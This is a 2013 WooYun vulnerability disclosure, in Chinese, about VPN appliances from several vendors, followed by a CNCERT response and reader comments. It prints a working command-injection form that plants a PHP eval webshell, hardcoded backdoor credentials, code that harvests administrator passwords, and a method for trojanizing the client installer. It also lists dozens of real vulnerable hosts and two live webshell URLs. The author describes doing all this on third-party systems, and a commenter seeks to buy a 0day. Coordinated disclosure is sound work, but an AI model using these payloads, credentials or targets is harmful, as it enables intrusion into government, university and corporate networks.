当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-024919

漏洞标题:[浅谈内网安全]--国内外多家vpn设备厂商批量漏洞

相关厂商:网御神州、天融信、西安网赢、卫士通、吉大正元、美国凹凸、德国 ANIX等多家VPN厂商设备

漏洞作者: 紫梦芊

提交时间:2013-06-01 11:23

修复时间:2013-08-30 11:24

公开时间:2013-08-30 11:24

漏洞类型:设计不当

危害等级:中

自评Rank:5

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-06-01: 细节已通知厂商并且等待厂商处理中
2013-06-03: 厂商已经确认,细节仅向厂商公开
2013-06-06: 细节向第三方安全合作伙伴开放
2013-07-28: 细节向核心白帽子及相关领域专家公开
2013-08-07: 细节向普通白帽子公开
2013-08-17: 细节向实习白帽子公开
2013-08-30: 细节向公众公开

简要描述:

继之前乌云上爆出深信服大量高危漏洞后,大家就感到vpn等基础设施的安全性非常值得重视,一暴露就涉及到内网系统的安全性,毕竟这些系统的安全性大都依赖于vpn验证有效用户,现在来发些其他厂商的高危吧(据知有人手中还有新版M5.9的0day).
该漏洞涉及到包括网御神州、天融信、西安网赢、卫士通、吉大正元、美国凹凸、德国 ANIX等多家VPN厂商设备在政务、地产、运营商、政府部门、高校、企业、公安、司法、银行等行业存在的任意文件下载、远程命令执行、维护后门、三方平台帐号泄漏、恶意客户端下发等高位漏洞。
发现有些时日了,很可惜的错过了乌云众测四期(知道四期是关于vpn的时四期已经结束了,不知道这些漏洞是不是那个厂商也有的)
为了防止像深信服那种问题,建议由cncert分发给各厂商,然后3个月后公开。

详细说明:

看到在北大读研的同学Ray发的信息东点西点进到了vpn.pku.edu.cn(当时还是o2的vpn,现在可以借鉴北大计算中心https://124.205.79.78/)然后尝试渗透测试,发现有个证书请求链接,点进去看可以下载东西,但是没有初始化mimiCA,于是想到同源通注,就去网上找相同代码特征的系统 很容易地找到了vpn.cnu.edu.cn/sub_ca.php

bb.jpg


在sub_ca_action.php?id=0看到 任意文件下载

cc.jpg


分别传入参数/etc/httpd/httpd.conf 和 httpd.conf获得apache配置 找到了web根路径为/ssl/www 于是想看看漏洞代码是如何的
然后分别传入传 /ssl/www/minica_down.php 和minica_down.php下载minica_down.php
前两行是发现

if($_POST['realfile'])
	exec("cp ".$_POST['realfile']." ".$_POST['path']."");


(感觉这些vpn设备的开发管用C和shell的思想,所以喜欢用system和exec不喜欢php内置函数)
幸好之前在淘宝实习时学过白盒 能看懂些代码 于是 有了任意命令执行

<form action="https://IP/minica_down.php" method="post">
<input name="realfile" type="hidden" value="aimee.php aimee.php || echo '<?php eval($_POST[cmd]);?>It works' >/ssl/www/aimee.php ">
<input type=hidden>
<input type=submit>
</form>


提交一个后门

dd.jpg


用菜刀连接,获得root权限, 这还没结束。
对代码进行些审计,发现开发留的后门/ssl/www/admin/debug.php 帐号密码o2micro killbug(部分厂家已经去掉)
然后发现mysql不向外开放并且是unix的socket方式去访问的
但是可以通过
ini_set("mysql.default_socket = /var/run/mysql/mysql.sock"); 去连接
可以exec("/ssl/mysqld/mysqldump >xxx") 导出或是用exec执行sql等
然后管理员密码是sha1加密了的 于是在/ssl/www/admin/login_action.php第128行(认证成功后)加入 (初学php,别见笑)

$obj=file_get_contents("admin.json");
		$userList=json_decode($obj);
		$userList->$UserName=$UserPass;
		file_put_contents("admin.json",json_encode($userList));


钓取管理员账号密码
钓鱼后进入后台了解了下系统,发现三方LDAP、AD认证方式管理帐号密码可以在html代码中看到明文,
其次就是存储三方系统登录地址、帐号、密码用来实现SSO的子帐号也是明文,数据库中一看,证实未进行任何加密处理,至少也应该来个AES吧(一些系统没配认证方式和子帐号)
使用一次vpn后发现是web端安装插件方式安装客户端,于是尝试给客户端加点东西试试,对于dll绑恶意dll我不会(而且给dll签名没证书),只能在exe上拙劣的下手,于是到/ssl/www/download/ClientSetup.exe(app.exe.cab应该也存在问题)
下载下来,用winrar生成自解压运行的包含恶意文件和ClientSetup.exe的新ClientSetup.exe 传入到原目录替换后能够达到在内网种植木马的功效。
-------------------------------------------------------
存在漏洞的站点至少包括
美国凹凸科技(o2security)
https://vpn.bit.edu.cn/ 北京理工
https://sslvpn.bjtu.edu.cn/ 北交大
https://125.46.88.100/ 郑州大学
https://219.80.0.19/p 国泰地产集团
https://info.nai.edu.cn/ 北京国家会计学院
https://124.205.79.78/ 北大计算中心
https://210.82.53.201/ 北京联合大学
https://vpn.cnu.edu.cn/ 首都师大
https://vpn.mcut.edu.tw/ 台湾明志科技大学
https://ac.whlib.gov.cn 武汉图书馆
https://sslvpn.nhcue.edu.tw 新竹教育大学
https://isms.ydu.edu.tw/ 育達商業科技大學
https://sslvpn.ydu.edu.tw/ 育達商業科技大學
https://vpn.cute.edu.tw 中国(台湾)科技大学
https://sslvpn.ntue.edu.tw 国立台北教育大学
https://vpn.psi.com.tw 升阳国际
https://maltimur.jksm.gov.my/ 马来西亚某政府网站
https://vpn.ccom.edu.cn 中央音乐学院
https://vpn.dlmu.edu.cn 大连海事大学
https://vpn.wanfang.edu.cn 河南理工
https://vpn.genius.com.cn 深圳巨灵
https://sslvpn.changhongit.com 长虹佳华
https://vpn.jnrd.com.cn 北京京能热电
https://sslvpn.kworld.com.tw 廣寰台北辦公室
https://www.oo586.com/ 易宝支付
https://svpn.mbatec.com.tw 新碩資訊
https://sslvpn.szs.com.tw 新日兴
https://sslvpn.gzcatv.net 广数传媒
https://e.nais.net.cn 农业部农E通
https://vpn.thcic.cn 清华
https://vpn.pku.edu.cn/ 北大(已经失效)
https://vpn.cau.edu.cn/ 中国农大(已经换了)
https://sh-vpn.o2micro.com o2
https://bj-vpn.o2micro.com o2
https://cd-vpn.o2micro.com o2
天融信 网络卫士VPN系统(admin/debug.php o2micro killbug)
https://218.26.21.194/ 山西邮政VPN系统
https://218.26.7.112/ 山西检验检疫局VPN系统
联想网神-网御神州 SecSSL3600(号称国内第一的SSLVPN)
https://220.178.250.102/ 马鞍山市行政事业单位资产管理信息系统
https://vpn.hnuu.edu.cn/ 淮南联大
https://222.75.160.120/
https://60.191.18.54/
https://61.191.18.137/ 合肥市房地产市场信息系统
https://218.22.51.114/ 安徽省肥西财政局
https://183.166.187.156/ 黄山市网上房地产信息系统
https://oa.qzbsg.gov.cn 广西钦州保税港区
https://www.smfgny.com 陕西煤业化工集团
https://cbj.1203.org 残疾人就业保障金征缴管理系统
https://58.54.252.40 荆州电子政务外网
https://218.24.94.244 沈阳市经济和信息化委员会
https://219.141.234.54/ 中国渔政管理指挥系统
https://vpn.cdc.com.cn 成都普天电缆
https://58.242.162.242/
https://116.236.137.18/
https://oa.qzbsg.gov.cn/
https://122.225.14.154/
https://60.191.18.54/
西安网赢信息技术有限公司 护航者
https://125.65.179.230/ 四川省丹棱县党政综合办公平台
https://www.scxjrz.com/ 四川电信安全运营中心
德国ANIX
https://vpn.tgsh.ttct.edu.tw/ 台东女中
卫士通 中华卫士
https://ssl.qztc.com/welcome.php 泉州电信
吉大正元
https://oa.chnmuseum.cn/ 国家博物馆
https://218.62.26.250/
https://219.143.243.103/
这些里面没有minica_down的就有debug后门,没debug的就有minica_down问题 很多是都存在。
在这些厂商描述中他们在公安网 银行专网 审计署内部网络 司法专网等私网也用了这些系统保护信息安全 据我猜想如果这些私网中肯定更有很多不堪一击的系统。
所以个人认为内网安全不能仅仅去依靠防火墙 VPN IDS等设备去完成 一旦这些设备出现问题 或是被合法绕过 里面的系统如果安全性不够的话 信息泄漏是很轻易的事。

漏洞证明:

cc.jpg


dd.jpg


gg.jpg


两个一句话例子
https://vpn.thcic.cn/sms_inc.php
https://218.26.21.194/sms_inc.php

修复方案:

1.删除debug.php
2.minica_down.php第2和12行
exec("cp ".$_POST['realfile']." ".$_POST['path']."");改为
copy($_POST['realfile'],$_POST['path'])
exec("rm ".$_POST["path"]."");改为
unlink($_POST['path'])
3.子帐号和三方认证平台管理信息使用AES或3des加密存在数据库中 防止脱裤后的更大安全危害
4.在客户端安全加入checksum

版权声明:转载请注明来源 紫梦芊@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-06-03 22:29

厂商回复:

CNVD确认并复现所述其中三个厂商案例情况,另外四家厂商可确认产品同源,但实测未发现包含或远程执行相关结果。根据后续源代码分析,OEM为主要原因,问题根源出现在第一家厂商上。
针对测试得到的部分结果,CNVD以及CNCERT采用以下方式进行:1、CNVD向国内相关VPN设备厂商询查是否OEM目标厂商产品,并协调涉事的三家厂商先行处置;2、对于涉及的政府和重要部门,转由CNCERT协调设备管理单位处置(包含一些工业和信息化部直属高校);
最早在明天应该会有一个通信行业通报出来,向社会公众发布预警。
rank 30?40?

最新状态:

暂无

漏洞评价:

评论

  1. 2013-06-01 11:24 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)

    好屌的样子 mark

  2. 2013-06-01 11:27 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    我特别喜欢追电视剧

  3. 2013-06-01 11:29 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    给力

  4. 2013-06-01 11:37 | ACGT ( 实习白帽子 | Rank:32 漏洞数:4 | another script kiddie)

    真有M5.9的0day?高价求购,保证自用不外传

  5. 2013-06-01 11:40 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @ACGT 什么是M5.9?

  6. 2013-06-01 12:18 | YwiSax ( 实习白帽子 | Rank:62 漏洞数:4 | 淡定。)

    表示关注,po主碉堡了。

  7. 2013-06-01 12:20 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @YwiSax 叫洞主

  8. 2013-06-01 12:45 | 超人不会飞 ( 实习白帽子 | Rank:85 漏洞数:24 | 好好学习,天天向上!)

    mark一下!

  9. 2013-06-01 13:50 | 子墨 ( 普通白帽子 | Rank:194 漏洞数:22 | 天地不仁,以万物为刍狗;圣人不仁,以百姓为...)

    上次那个漏洞的利用?

  10. 2013-06-01 14:04 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    好厉害的样子

  11. 2013-06-01 14:48 | cncert国家互联网应急中心(乌云厂商)

    MARK,已经跟进。

  12. 2013-06-01 14:54 | 紫梦芊 ( 普通白帽子 | Rank:138 漏洞数:9 | 踏踏实实做测试)

    不厉害 涉及得比较广而已 之前没尝试出来的dll捆绑得到了指点:网上有很多dll捆绑工具,然后签名不一定用原厂商的签名,只要是杀软可信厂商的签名就可以在线安装时比较方便的绕过杀软,而且这类软件跟多数杀软的不兼容性能让种植更容易。关于里面涉及到朋友的厂商,我想说其实每个厂商都有很多系统 而我所在公司N多系统天天被N多人蹂躏 弹窗 更多的是我不擅长的领域或应用 个人能力有限 而且那些系统跟我无关呵呵。

  13. 2013-06-01 15:36 | ACGT ( 实习白帽子 | Rank:32 漏洞数:4 | another script kiddie)

    @xsser 深信服M5.9

  14. 2013-06-01 17:09 | YwiSax ( 实习白帽子 | Rank:62 漏洞数:4 | 淡定。)

    @xsser 收到,大洞主。

  15. 2013-06-01 17:23 | none ( 实习白帽子 | Rank:40 漏洞数:5 | 十次十次啊 hack it then know more~)

    卫士通 吉大正元 网神 这些都和公安部的公安网 关系密切哦

  16. 2013-06-01 19:54 | 8点半 ( 路人 | Rank:16 漏洞数:5 | 你当哥是CPU啊,人生价值就是执行指令?)

    哇 赶脚好厉害

  17. 2013-06-01 22:24 | hacker@sina.cn ( 普通白帽子 | Rank:288 漏洞数:27 | ANONYMOUS)

    楼上签名很给力 ,老子也不是内存啊想怎么插就怎么插

  18. 2013-06-01 22:34 | 8点半 ( 路人 | Rank:16 漏洞数:5 | 你当哥是CPU啊,人生价值就是执行指令?)

    @hacker@sina.cn - -被插很爽的

  19. 2013-06-01 22:49 | 肉肉 认证白帽子 ( 普通白帽子 | Rank:112 漏洞数:10 | 肉肉在长亭科技,肉肉在长亭科技,肉肉在长...)

    感觉好高级的样子

  20. 2013-06-01 22:50 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)

    @肉肉 代码审计之类的高端手段。。。

  21. 2013-06-01 22:51 | 肉肉 认证白帽子 ( 普通白帽子 | Rank:112 漏洞数:10 | 肉肉在长亭科技,肉肉在长亭科技,肉肉在长...)

    @淡漠天空 教我代码审计嘛,不会代码审计

  22. 2013-06-02 13:09 | 紫梦芊 ( 普通白帽子 | Rank:138 漏洞数:9 | 踏踏实实做测试)

    @xsser @疯狗 @GaRy 加了马来西亚 审核下..

  23. 2013-06-02 17:42 | cncert国家互联网应急中心(乌云厂商)

    已经完成部分实例复现,准备周一的时候集中通报处置。

  24. 2013-06-02 17:49 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @cncert国家互联网应急中心 周末还加班建设社会主义?

  25. 2013-06-02 17:53 | cncert国家互联网应急中心(乌云厂商)

    @xsser 这个洞问题比较大,得及时搞定。社会主义还缺不少瓦,得补补。。白帽子这么给力,不补不行。

  26. 2013-06-02 20:21 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    @紫梦芊 @cncert国家互联网应急中心 明显暗示DZ报洞的时间不对,不该周六嘛,让人家加班多不好。。下次有大问题,记得要赶在节假日放假前一天报哟。例如:元旦、清明、五一、端午啥的,六日就让人家好好休息嘛。。。

  27. 2013-06-02 20:50 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)

    @肉肉 我系统都不会 更别说代码

  28. 2013-06-03 09:43 | 夜不眠 ( 路人 | Rank:15 漏洞数:1 | 早睡早起,方能养生啊)

    这个漏洞完全可以分厂商分漏洞来提啊,最后再来点行业补丁不及时,这样也能更加地详尽撒,@cncert国家互联网应急中心 也不用周末加班撒 @紫梦芊 也可以混点RANK撒 明显是洞主对乌云的RANK规则不够熟悉啊 哈哈 感觉洞主故意在周六发的..

  29. 2013-06-04 09:33 | 紫梦芊 ( 普通白帽子 | Rank:138 漏洞数:9 | 踏踏实实做测试)

    @cncert国家互联网应急中心 包含或远程执行那个我发了个重现的例子到cncert@cert.org.cn了 关于我提交的漏洞让你们加班的事情表示非常的惭愧 主要因为之前父亲生病和版本发布等事情一直没时间发 @xsser 能不能把获得的乌币捐给cncert呢? 或叫感谢厂商..

  30. 2013-06-04 09:35 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @紫梦芊 那是开玩笑的 ...

  31. 2013-06-05 17:31 | Yoc ( 路人 | Rank:0 漏洞数:1 | http://yoc.tk)

    你们这样零日零日地吓厂家,人家以后都不来了,哈哈

  32. 2013-06-05 22:41 | 紫梦芊 ( 普通白帽子 | Rank:138 漏洞数:9 | 踏踏实实做测试)

    @Yoc 嗯 这个漏洞确实是这几个厂商的0day,你怎么知道是0day的?

  33. 2013-06-13 17:59 | none ( 实习白帽子 | Rank:40 漏洞数:5 | 十次十次啊 hack it then know more~)

    这些VPN的源头是美国凹凸科技

  34. 2013-06-24 09:32 | 小乐天 ( 实习白帽子 | Rank:64 漏洞数:14 | From KnownSec)

    mark一下

  35. 2013-07-02 12:57 | if、so 认证白帽子 ( 核心白帽子 | Rank:1008 漏洞数:91 | 梦想还是要有的,万一实现了呢?)

    @紫梦芊 ana-na/auth/url_default/welcome.cgi请问这种的vpn是哪家的

  36. 2013-07-02 13:42 | 紫梦芊 ( 普通白帽子 | Rank:138 漏洞数:9 | 踏踏实实做测试)

    @if、so dana-na/ juniper的VPN 据知思科的和juniper的占全球VPN市场很大份额

  37. 2013-07-11 12:11 | 无敌L.t.H ( 路人 | Rank:21 漏洞数:4 | ‮……肉肉捉活,亭长放解)

    内网一般都是一马平川,各ISP的重要VPDN我进去看过,默认密码一大堆,版本都是几年前十几年前的。别说打什么信息战,光这些基础设施挂了都够喝几壶了。

  38. 2013-07-11 12:31 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @无敌L.t.H 跟领导人说去!

  39. 2013-07-12 09:50 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    哎,要是有这样的妹纸做女友,那该是多么多么多么多么幸福的一件事情。。我都能幻想到,娶个女黑阔回家会发生什么惨事。。电脑被装免杀远控、智能手机被监控、数据恢复电脑中的文件and照片、玩游戏被蓝钻踢出去,然后骂一句FUCK,果断黑了对方的QQ号。。。好残忍。。。好残忍。。。

  40. 2013-07-12 09:52 | 小沛 ( 路人 | Rank:11 漏洞数:3 | 大数据时代来领,求租大数据 531827272#qq.c...)

    厂商回复很叼,看样子漏洞也叼,期待公开

  41. 2013-07-12 10:51 | 倒霉熊 ( 路人 | Rank:20 漏洞数:6 | *好简要)

    哎,要是有这样的妹纸做女友,那该是多么多么多么多么幸福的一件事情。。 我都能幻想到,娶个女黑阔回家会发生什么惨事。。 电脑被装免杀远控、智能手机被监控、数据恢复电脑中的文件and照片、玩游戏被蓝钻踢出去,然后骂一句FUCK,果断黑了对方的QQ号。。。 好残忍。。。好残忍。。。

  42. 2013-07-12 12:59 | 小黑要低调 ( 实习白帽子 | Rank:47 漏洞数:4 | 小黑一枚)

    @鬼魅羊羔 你这是得了便宜还卖乖。。。。

  43. 2013-07-12 13:48 | none ( 实习白帽子 | Rank:40 漏洞数:5 | 十次十次啊 hack it then know more~)

    @小黑要低调 你误会了 他们不认识

  44. 2013-07-12 16:17 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    @小黑要低调 我去。。。

  45. 2013-07-14 23:14 | hacker@sina.cn ( 普通白帽子 | Rank:288 漏洞数:27 | ANONYMOUS)

    漏洞不错, 已打赏.

  46. 2013-07-15 09:46 | none ( 实习白帽子 | Rank:40 漏洞数:5 | 十次十次啊 hack it then know more~)

    一直认为洞主存管理员密码的方式比较非主流 呵呵 一般都是直接user--pass\r\n 简单明了好看

  47. 2013-07-15 16:30 | luwikes ( 普通白帽子 | Rank:512 漏洞数:77 | 潜心学习~~~)

    对代码进行些审计,发现开发留的后门/ssl/www/admin/debug.php 帐号密码o2micro killbug开发是要逆天吗?

  48. 2013-07-15 16:35 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @luwikes 如果确认的话 请报告乌云一只

  49. 2013-07-15 17:04 | luwikes ( 普通白帽子 | Rank:512 漏洞数:77 | 潜心学习~~~)

    @xsser 摘抄的洞主的话,第一张菜刀图下面的第二行。

  50. 2013-07-15 17:13 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @luwikes 以为你独立审计的

  51. 2013-07-15 17:45 | 夜不眠 ( 路人 | Rank:15 漏洞数:1 | 早睡早起,方能养生啊)

    @淡漠天空 为什么2013-06-01 22:50 就知道是代码审计了?

  52. 2013-07-15 17:48 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)

    @夜不眠 没有源码你能日进去?假了吧

  53. 2013-07-15 17:49 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)

    @淡漠天空 我更好奇你怎么拿到源码的?

  54. 2013-07-15 17:50 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)

    .0.0.@成自己了 囧

  55. 2013-07-15 18:06 | YwiSax ( 实习白帽子 | Rank:62 漏洞数:4 | 淡定。)

    = = 楼主的修复方案。。。是不是故意的啊。。。

  56. 2013-07-16 08:56 | 夜不眠 ( 路人 | Rank:15 漏洞数:1 | 早睡早起,方能养生啊)

    @淡漠天空 7月初 看到一个普白之前说公开了 然后我来看没公开 就求他告诉我详情了 就这样 而你很奇怪的是6月1日就知道是代码审计

  57. 2013-07-16 09:03 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)

    @夜不眠 奇怪么 逆向思维

  58. 2013-07-16 21:41 | JOKER96 ( 路人 | Rank:10 漏洞数:2 | 95后菜鸟)

    碉堡了 我觉应该rank50

  59. 2013-07-23 21:22 | 残影小L ( 路人 | Rank:12 漏洞数:3 | 我还是我。)

    rank 30?40?。。。

  60. 2013-07-31 22:39 | 花心 ( 路人 | Rank:14 漏洞数:6 | 我是来找机油的。)

    @紫梦芊 我们公司就是安装的深信服的上网行为管理求大牛看看能不能有神马办法搞到网关登陆的密码我电脑被限制不能上网操蛋网速也很慢 每次打开乌云的群都要等6秒 求大牛帮忙啊

  61. 2013-08-01 17:07 | 无敌L.t.H ( 路人 | Rank:21 漏洞数:4 | ‮……肉肉捉活,亭长放解)

    @花心 我有个学长是深信服的,我问看看有没有什么0day。

  62. 2013-08-30 12:13 | none ( 实习白帽子 | Rank:40 漏洞数:5 | 十次十次啊 hack it then know more~)

    一直觉得洞主存 密码的方式不佳

  63. 2013-09-29 12:09 | M4sk ( 普通白帽子 | Rank:1199 漏洞数:319 | 国内信息安全任重而道远,还需要厂商和白帽...)

    碉堡

  64. 2013-09-29 12:09 | M4sk ( 普通白帽子 | Rank:1199 漏洞数:319 | 国内信息安全任重而道远,还需要厂商和白帽...)

    碉堡

  65. 2013-10-03 21:11 | Wenien ( 路人 | Rank:27 漏洞数:3 | 既然目标是地平线,留给世界的只能是背影。)

    很好。楼主大四?

  66. 2014-04-08 08:40 | 晏子 ( 路人 | Rank:6 漏洞数:4 | 无)

    Rank 30?40?直接查水表算了。

  67. 2014-04-15 14:34 | secer ( 路人 | Rank:5 漏洞数:2 | 来乌云学习学习)

    mark

  68. 2014-09-20 21:42 | Mxx ( 路人 | Rank:0 漏洞数:2 | 没有)

    马克